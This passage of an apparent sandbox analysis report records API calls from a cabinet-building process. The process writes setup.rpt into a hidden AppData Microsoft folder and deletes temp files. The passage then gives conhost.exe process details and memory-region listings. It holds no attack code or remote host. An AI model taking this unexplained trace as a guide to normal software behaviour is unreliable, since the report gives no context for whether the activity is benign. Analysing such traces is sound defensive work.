(_Str1="DestinationDir", _Str2="InfFooter2") returned -5 [0256.495] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFooter2") returned -5 [0256.495] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFooter2") returned -5 [0256.495] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFooter2") returned -5 [0256.495] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFooter2") returned -3 [0256.495] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFooter2") returned -3 [0256.495] _strcmpi (_Str1="GenerateInf", _Str2="InfFooter2") returned -2 [0256.495] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFooter2") returned -3 [0256.495] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFooter2") returned -3 [0256.495] _strcmpi (_Str1="InfCommentString", _Str2="InfFooter2") returned -3 [0256.495] _strcmpi (_Str1="InfDateFormat", _Str2="InfFooter2") returned -2 [0256.495] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFooter2") returned -2 [0256.495] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFooter2") returned -2 [0256.495] _strcmpi (_Str1="InfFileHeader", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="InfFileName", _Str2="InfFooter2") returned -6 [0256.495] _strcmpi (_Str1="InfFooter", _Str2="InfFooter2") returned -50 [0256.495] _strcmpi (_Str1="InfFooter1", _Str2="InfFooter2") returned -1 [0256.495] _strcmpi (_Str1="InfFooter2", _Str2="InfFooter2") returned 0 [0256.495] atoi (_Str="1** Automatically generated on: %2 **") returned 1 [0256.495] atoi (_Str="2 **") returned 2 [0256.495] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.495] _vsnprintf (in: _DstBuf=0x27e87fedf3, _MaxCount=0x1fc, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf="Tue Nov 06 11:27:43 2018") returned 24 [0256.495] atoi (_Str="1** Automatically generated on: %2 **") returned 1 [0256.495] atoi (_Str="2 **") returned 2 [0256.496] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.496] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfFooter%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfFooter3") returned 10 [0256.496] _strcmpi (_Str1="Cabinet", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="ClusterSize", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="Compress", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFooter3") returned 3 [0256.496] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="CompressionType", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="CompressionLevel", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="CompressionMemory", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="DestinationDir", _Str2="InfFooter3") returned -5 [0256.496] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFooter3") returned -5 [0256.496] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFooter3") returned -5 [0256.496] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFooter3") returned -5 [0256.496] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFooter3") returned -3 [0256.496] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFooter3") returned -3 [0256.496] _strcmpi (_Str1="GenerateInf", _Str2="InfFooter3") returned -2 [0256.496] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFooter3") returned -3 [0256.496] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFooter3") returned -3 [0256.496] _strcmpi (_Str1="InfCommentString", _Str2="InfFooter3") returned -3 [0256.496] _strcmpi (_Str1="InfDateFormat", _Str2="InfFooter3") returned -2 [0256.496] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFooter3") returned -2 [0256.496] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFooter3") returned -2 [0256.496] _strcmpi (_Str1="InfFileHeader", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="InfFileName", _Str2="InfFooter3") returned -6 [0256.496] _strcmpi (_Str1="InfFooter", _Str2="InfFooter3") returned -51 [0256.496] _strcmpi (_Str1="InfFooter1", _Str2="InfFooter3") returned -2 [0256.496] _strcmpi (_Str1="InfFooter2", _Str2="InfFooter3") returned -1 [0256.496] _strcmpi (_Str1="InfFooter3", _Str2="InfFooter3") returned 0 [0256.496] atoi (_Str="1** **") returned 1 [0256.497] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.497] atoi (_Str="1** **") returned 1 [0256.497] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.497] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfFooter%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfFooter4") returned 10 [0256.497] _strcmpi (_Str1="Cabinet", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="ClusterSize", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="Compress", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFooter4") returned 3 [0256.497] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="CompressionType", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="CompressionLevel", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="CompressionMemory", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="DestinationDir", _Str2="InfFooter4") returned -5 [0256.497] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFooter4") returned -5 [0256.497] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFooter4") returned -5 [0256.497] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFooter4") returned -5 [0256.497] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFooter4") returned -3 [0256.497] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFooter4") returned -3 [0256.497] _strcmpi (_Str1="GenerateInf", _Str2="InfFooter4") returned -2 [0256.497] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFooter4") returned -3 [0256.497] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFooter4") returned -3 [0256.497] _strcmpi (_Str1="InfCommentString", _Str2="InfFooter4") returned -3 [0256.497] _strcmpi (_Str1="InfDateFormat", _Str2="InfFooter4") returned -2 [0256.497] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFooter4") returned -2 [0256.497] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFooter4") returned -2 [0256.497] _strcmpi (_Str1="InfFileHeader", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="InfFileName", _Str2="InfFooter4") returned -6 [0256.497] _strcmpi (_Str1="InfFooter", _Str2="InfFooter4") returned -52 [0256.497] _strcmpi (_Str1="InfFooter1", _Str2="InfFooter4") returned -3 [0256.497] _strcmpi (_Str1="InfFooter2", _Str2="InfFooter4") returned -2 [0256.498] _strcmpi (_Str1="InfFooter3", _Str2="InfFooter4") returned -1 [0256.498] _strcmpi (_Str1="InfFooter4", _Str2="InfFooter4") returned 0 [0256.498] atoi (_Str="1*** END ************************************************************") returned 1 [0256.498] _vsnprintf (in: _DstBuf=0x27e87fedf0, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fed58 | out: _DstBuf=";") returned 1 [0256.498] atoi (_Str="1*** END ************************************************************") returned 1 [0256.498] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\r\n" | out: _File=0x7ff97744e2a0) returned 71 [0256.498] _vsnprintf (in: _DstBuf=0x27e87ff0e0, _MaxCount=0x1f, _Format="InfFooter%d", _ArgList=0x27e87fef38 | out: _DstBuf="InfFooter5") returned 10 [0256.498] _strcmpi (_Str1="Cabinet", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="CabinetNameTemplate", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="ChecksumWidth", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="ClusterSize", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="Compress", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="LongSourceFileNames", _Str2="InfFooter5") returned 3 [0256.498] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="CompressionType", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="CompressionLevel", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="CompressionMemory", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="DestinationDir", _Str2="InfFooter5") returned -5 [0256.498] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="InfFooter5") returned -5 [0256.498] _strcmpi (_Str1="DiskLabelTemplate", _Str2="InfFooter5") returned -5 [0256.498] _strcmpi (_Str1="DoNotCopyFiles", _Str2="InfFooter5") returned -5 [0256.498] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="InfFooter5") returned -3 [0256.498] _strcmpi (_Str1="FolderSizeThreshold", _Str2="InfFooter5") returned -3 [0256.498] _strcmpi (_Str1="GenerateInf", _Str2="InfFooter5") returned -2 [0256.498] _strcmpi (_Str1="InfCabinetHeader", _Str2="InfFooter5") returned -3 [0256.498] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="InfFooter5") returned -3 [0256.498] _strcmpi (_Str1="InfCommentString", _Str2="InfFooter5") returned -3 [0256.498] _strcmpi (_Str1="InfDateFormat", _Str2="InfFooter5") returned -2 [0256.498] _strcmpi (_Str1="InfDiskHeader", _Str2="InfFooter5") returned -2 [0256.498] _strcmpi (_Str1="InfDiskLineFormat", _Str2="InfFooter5") returned -2 [0256.498] _strcmpi (_Str1="InfFileHeader", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="InfFileLineFormat", _Str2="InfFooter5") returned -6 [0256.498] _strcmpi (_Str1="InfFileName", _Str2="InfFooter5") returned -6 [0256.499] _strcmpi (_Str1="InfFooter", _Str2="InfFooter5") returned -53 [0256.499] _strcmpi (_Str1="InfFooter1", _Str2="InfFooter5") returned -4 [0256.499] _strcmpi (_Str1="InfFooter2", _Str2="InfFooter5") returned -3 [0256.499] _strcmpi (_Str1="InfFooter3", _Str2="InfFooter5") returned -2 [0256.499] _strcmpi (_Str1="InfFooter4", _Str2="InfFooter5") returned -1 [0256.499] _strcmpi (_Str1="InfHeader", _Str2="InfFooter5") returned 2 [0256.499] _strcmpi (_Str1="InfHeader1", _Str2="InfFooter5") returned 2 [0256.499] _strcmpi (_Str1="InfHeader2", _Str2="InfFooter5") returned 2 [0256.499] _strcmpi (_Str1="InfHeader3", _Str2="InfFooter5") returned 2 [0256.499] _strcmpi (_Str1="InfHeader4", _Str2="InfFooter5") returned 2 [0256.499] _strcmpi (_Str1="InfHeader5", _Str2="InfFooter5") returned 2 [0256.499] _strcmpi (_Str1="InfHeader6", _Str2="InfFooter5") returned 2 [0256.499] _strcmpi (_Str1="InfSectionOrder", _Str2="InfFooter5") returned 13 [0256.499] _strcmpi (_Str1="MaxCabinetSize", _Str2="InfFooter5") returned 4 [0256.499] _strcmpi (_Str1="MaxDiskFileCount", _Str2="InfFooter5") returned 4 [0256.499] _strcmpi (_Str1="MaxDiskSize", _Str2="InfFooter5") returned 4 [0256.499] _strcmpi (_Str1="MaxErrors", _Str2="InfFooter5") returned 4 [0256.499] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="InfFooter5") returned 9 [0256.499] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="InfFooter5") returned 9 [0256.499] _strcmpi (_Str1="ReservePerFolderSize", _Str2="InfFooter5") returned 9 [0256.499] _strcmpi (_Str1="RptFileName", _Str2="InfFooter5") returned 9 [0256.499] _strcmpi (_Str1="SourceDir", _Str2="InfFooter5") returned 10 [0256.499] _strcmpi (_Str1="UniqueFiles", _Str2="InfFooter5") returned 12 [0256.499] _strcmpi (_Str1="DiskDirectory1", _Str2="InfFooter5") returned -5 [0256.499] _strcmpi (_Str1="CabinetName1", _Str2="InfFooter5") returned -6 [0256.499] atoi (_Str="1") returned 1 [0256.499] _vsnprintf (in: _DstBuf=0x27e87fed90, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87fecf8 | out: _DstBuf="InfFooter5") returned 10 [0256.499] atoi (_Str="1") returned 1 [0256.499] fclose (in: _File=0x7ff97744e2a0 | out: _File=0x7ff97744e2a0) returned 0 [0256.501] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_2") returned 0 [0256.503] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_3") returned 0 [0256.504] remove (_FileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\inf_512_4") returned 0 [0256.505] _strcmpi (_Str1="Cabinet", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="CabinetFileCountThreshold", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="CabinetNameTemplate", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="ChecksumWidth", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="ClusterSize", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="Compress", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="LongSourceFileNames", _Str2="RptFileName") returned -6 [0256.505] _strcmpi (_Str1="CompressedFileExtensionChar", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="CompressionType", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="CompressionLevel", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="CompressionMemory", _Str2="RptFileName") returned -15 [0256.505] _strcmpi (_Str1="DestinationDir", _Str2="RptFileName") returned -14 [0256.505] _strcmpi (_Str1="DiskDirectoryTemplate", _Str2="RptFileName") returned -14 [0256.505] _strcmpi (_Str1="DiskLabelTemplate", _Str2="RptFileName") returned -14 [0256.505] _strcmpi (_Str1="DoNotCopyFiles", _Str2="RptFileName") returned -14 [0256.505] _strcmpi (_Str1="FolderFileCountThreshold", _Str2="RptFileName") returned -12 [0256.505] _strcmpi (_Str1="FolderSizeThreshold", _Str2="RptFileName") returned -12 [0256.505] _strcmpi (_Str1="GenerateInf", _Str2="RptFileName") returned -11 [0256.506] _strcmpi (_Str1="InfCabinetHeader", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfCabinetLineFormat", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfCommentString", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfDateFormat", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfDiskHeader", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfDiskLineFormat", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfFileHeader", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfFileLineFormat", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfFileName", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfFooter", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfFooter1", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfFooter2", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfFooter3", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfFooter4", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfHeader", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfHeader1", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfHeader2", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfHeader3", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfHeader4", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfHeader5", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfHeader6", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="InfSectionOrder", _Str2="RptFileName") returned -9 [0256.506] _strcmpi (_Str1="MaxCabinetSize", _Str2="RptFileName") returned -5 [0256.506] _strcmpi (_Str1="MaxDiskFileCount", _Str2="RptFileName") returned -5 [0256.506] _strcmpi (_Str1="MaxDiskSize", _Str2="RptFileName") returned -5 [0256.507] _strcmpi (_Str1="MaxErrors", _Str2="RptFileName") returned -5 [0256.507] _strcmpi (_Str1="ReservePerCabinetSize", _Str2="RptFileName") returned -11 [0256.507] _strcmpi (_Str1="ReservePerDataBlockSize", _Str2="RptFileName") returned -11 [0256.507] _strcmpi (_Str1="ReservePerFolderSize", _Str2="RptFileName") returned -11 [0256.507] fopen (_Filename="setup.rpt" (normalized: "c:\\users\\ciihmn~1\\appdata\\roaming\\micros~1\\{25e2f~1\\setup.rpt"), _Mode="wt") returned 0x7ff97744e2a0 [0256.507] ctime (param_1=0x27e87ff2e0) returned="Tue Nov 06 11:27:43 2018\n" [0256.507] atoi (_Str="1") returned 1 [0256.507] _vsnprintf (in: _DstBuf=0x27e87fef90, _MaxCount=0x1ff, _Format="%s", _ArgList=0x27e87feef8 | out: _DstBuf="Tue Nov 06 11:27:43 2018\n") returned 25 [0256.507] atoi (_Str="1") returned 1 [0256.507] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\n" | out: _File=0x7ff97744e2a0) returned 42 [0256.507] atoi (_Str="1") returned 1 [0256.507] _vsnprintf (in: _DstBuf=0x27e87fef90, _MaxCount=0x1ff, _Format="%13ld", _ArgList=0x27e87feef8 | out: _DstBuf=" 1") returned 13 [0256.508] strspn (_Str=" 1", _Control=" ") returned 0xc [0256.508] strpbrk (_Str="1", _Control=" ") returned 0x0 [0256.508] atoi (_Str="1") returned 1 [0256.508] printf (_Format="%s%s\n") returned 34 [0256.635] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\n" | out: _File=0x7ff97744e2a0) returned 28 [0256.635] atoi (_Str="1") returned 1 [0256.636] _vsnprintf (in: _DstBuf=0x27e87fef90, _MaxCount=0x1ff, _Format="%13ld", _ArgList=0x27e87feef8 | out: _DstBuf=" 96") returned 13 [0256.636] strspn (_Str=" 96", _Control=" ") returned 0xb [0256.636] strpbrk (_Str="96", _Control=" ") returned 0x0 [0256.636] atoi (_Str="1") returned 1 [0256.636] printf (_Format="%s%s\n") returned 28 [0256.651] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\n" | out: _File=0x7ff97744e2a0) returned 28 [0256.651] atoi (_Str="1") returned 1 [0256.651] _vsnprintf (in: _DstBuf=0x27e87fef90, _MaxCount=0x1ff, _Format="%13ld", _ArgList=0x27e87feef8 | out: _DstBuf=" 74") returned 13 [0256.651] strspn (_Str=" 74", _Control=" ") returned 0xb [0256.651] strpbrk (_Str="74", _Control=" ") returned 0x0 [0256.651] atoi (_Str="1") returned 1 [0256.651] printf (_Format="%s%s\n") returned 28 [0256.674] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\n" | out: _File=0x7ff97744e2a0) returned 28 [0256.674] atoi (_Str="1%% compression") returned 1 [0256.674] _vsnprintf (in: _DstBuf=0x27e87fef90, _MaxCount=0x1ff, _Format="%6.2f", _ArgList=0x27e87feef8 | out: _DstBuf=" 77.08") returned 6 [0256.674] atoi (_Str="1%% compression") returned 1 [0256.675] printf (_Format="%s%s\n") returned 44 [0256.714] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\n" | out: _File=0x7ff97744e2a0) returned 44 [0256.714] atoi (_Str="1 seconds (%2 hr %3 min %4 sec)") returned 1 [0256.714] atoi (_Str="2 hr %3 min %4 sec)") returned 2 [0256.714] atoi (_Str="3 min %4 sec)") returned 3 [0256.714] atoi (_Str="4 sec)") returned 4 [0256.714] _vsnprintf (in: _DstBuf=0x27e87fef90, _MaxCount=0x1ff, _Format="%9.2f", _ArgList=0x27e87feef8 | out: _DstBuf=" 2.01") returned 9 [0256.714] _vsnprintf (in: _DstBuf=0x27e87fef9b, _MaxCount=0x1f4, _Format="%2d", _ArgList=0x27e87feef8 | out: _DstBuf=" 0") returned 2 [0256.714] _vsnprintf (in: _DstBuf=0x27e87fef9f, _MaxCount=0x1f0, _Format="%2d", _ArgList=0x27e87feef8 | out: _DstBuf=" 0") returned 2 [0256.714] _vsnprintf (in: _DstBuf=0x27e87fefa3, _MaxCount=0x1ec, _Format="%5.2f", _ArgList=0x27e87feef8 | out: _DstBuf=" 2.01") returned 5 [0256.714] atoi (_Str="1 seconds (%2 hr %3 min %4 sec)") returned 1 [0256.714] atoi (_Str="2 hr %3 min %4 sec)") returned 2 [0256.714] atoi (_Str="3 min %4 sec)") returned 3 [0256.714] atoi (_Str="4 sec)") returned 4 [0256.714] printf (_Format="%s%s\n") returned 64 [0256.822] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\n" | out: _File=0x7ff97744e2a0) returned 64 [0256.822] atoi (_Str="1 Kb/second") returned 1 [0256.823] _vsnprintf (in: _DstBuf=0x27e87fef90, _MaxCount=0x1ff, _Format="%9.2f", _ArgList=0x27e87feef8 | out: _DstBuf=" 0.05") returned 9 [0256.823] atoi (_Str="1 Kb/second") returned 1 [0256.823] printf (_Format="%s%s\n") returned 41 [0256.860] fprintf (in: _File=0x7ff97744e2a0, _Format="%s\n" | out: _File=0x7ff97744e2a0) returned 41 [0256.860] fclose (in: _File=0x7ff97744e2a0 | out: _File=0x7ff97744e2a0) returned 0 [0256.862] exit (_Code=0) Thread: id = 117 os_tid = 0xbd8 Process: id = "16" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x35122000" os_pid = "0xbcc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "15" os_parent_pid = "0x200" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1718 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1719 start_va = 0x91cbd90000 end_va = 0x91cbdaffff entry_point = 0x0 region_type = private name = "private_0x00000091cbd90000" filename = "" Region: id = 1720 start_va = 0x91cbdb0000 end_va = 0x91cbdc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000091cbdb0000" filename = "" Region: id = 1721 start_va = 0x91cbdd0000 end_va = 0x91cbe0ffff entry_point = 0x0 region_type = private name = "private_0x00000091cbdd0000" filename = "" Region: id = 1722 start_va = 0x7df5ffb60000 end_va = 0x7ff5ffb5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb60000" filename = "" Region: id = 1723 start_va = 0x7ff6844e0000 end_va = 0x7ff684502fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6844e0000" filename = "" Region: id = 1724 start_va = 0x7ff684503000 end_va = 0x7ff684503fff entry_point = 0x0 region_type = private name = "private_0x00007ff684503000" filename = "" Region: id = 1725 start_va = 0x7ff68450e000 end_va = 0x7ff68450ffff entry_point = 0x0 region_type = private name = "private_0x00007ff68450e000" filename = "" Region: id = 1726 start_va = 0x7ff6847f0000 end_va = 0x7ff684800fff entry_point = 0x7ff6847f0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1727 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1728 start_va = 0x91cbe50000 end_va = 0x91cbf4ffff entry_point = 0x0 region_type = private name = "private_0x00000091cbe50000" filename = "" Region: id = 1729 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1730 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1736 start_va = 0x91cbd90000 end_va = 0x91cbd9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000091cbd90000" filename = "" Region: id = 1737 start_va = 0x91cbda0000 end_va = 0x91cbda6fff entry_point = 0x0 region_type = private name = "private_0x00000091cbda0000" filename = "" Region: id = 1738 start_va = 0x91cbe10000 end_va = 0x91cbe4ffff entry_point = 0x0 region_type = private name = "private_0x00000091cbe10000" filename = "" Region: id = 1739 start_va = 0x91cbf50000 end_va = 0x91cc00dfff entry_point = 0x91cbf50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1740 start_va = 0x91cc010000 end_va = 0x91cc010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000091cc010000" filename = "" Region: id = 1741 start_va = 0x91cc020000 end_va = 0x91cc026fff entry_point = 0x0 region_type = private name = "private_0x00000091cc020000" filename = "" Region: id = 1742 start_va = 0x91cc030000 end_va = 0x91cc030fff entry_point = 0x0 region_type = private name = "private_0x00000091cc030000" filename = "" Region: id = 1743 start_va = 0x91cc040000 end_va = 0x91cc040fff entry_point = 0x0 region_type = private name = "private_0x00000091cc040000" filename = "" Region: id = 1744 start_va = 0x91cc150000 end_va = 0x91cc15ffff entry_point = 0x0 region_type = private name = "private_0x00000091cc150000" filename = "" Region: id = 1745 start_va = 0x91cc160000 end_va = 0x91cc2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000091cc160000" filename = "" Region: id = 1746 start_va = 0x91cc2f0000 end_va = 0x91cc470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000091cc2f0000" filename = "" Region: id = 1747 start_va = 0x91cc480000 end_va = 0x91cd87ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000091cc480000" filename = "" Region: id = 1748 start_va = 0x7ff6843e0000 end_va = 0x7ff6844dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6843e0000" filename = "" Region: id = 1749 start_va = 0x7ff68450c000 end_va = 0x7ff68450dfff entry_point = 0x0 region_type = private name = "private_0x00007ff68450c000" filename = "" Region: id = 1750 start_va = 0x7ff971180000 end_va = 0x7ff971302fff entry_point = 0x7ff971180000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1751 start_va = 0x7ff9722f0000 end_va = 0x7ff972342fff entry_point = 0x7ff9722f0000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1752 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1753 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 